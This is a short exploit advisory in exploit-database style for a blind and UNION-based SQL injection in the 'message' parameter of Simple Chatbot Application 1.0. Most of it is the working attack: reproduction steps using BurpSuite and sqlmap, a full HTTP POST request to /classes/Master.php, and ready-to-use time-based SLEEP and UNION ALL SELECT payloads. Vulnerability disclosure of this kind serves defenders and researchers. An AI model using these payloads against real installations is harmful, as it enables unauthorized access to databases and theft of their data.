Simple Chatbot Application 1.0 SQL Injection

`# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi  
# Date: 18/01/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Windows 10  
  
# Steps  
# Go to : http://127.0.0.1/classes/Master.php?f=get_response  
# Save request in BurpSuite  
# Run saved request with sqlmap -r sql.txt  
  
======  
  
POST /classes/Master.php?f=get_response HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Encoding: gzip,deflate  
Content-Length: 73  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Connection: Keep-alive  
  
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud  
  
======  
  
#Payloads  
  
#Payload (UNION query)  
message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -  
  
#(AND/OR time-based blind)  
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud  
  
`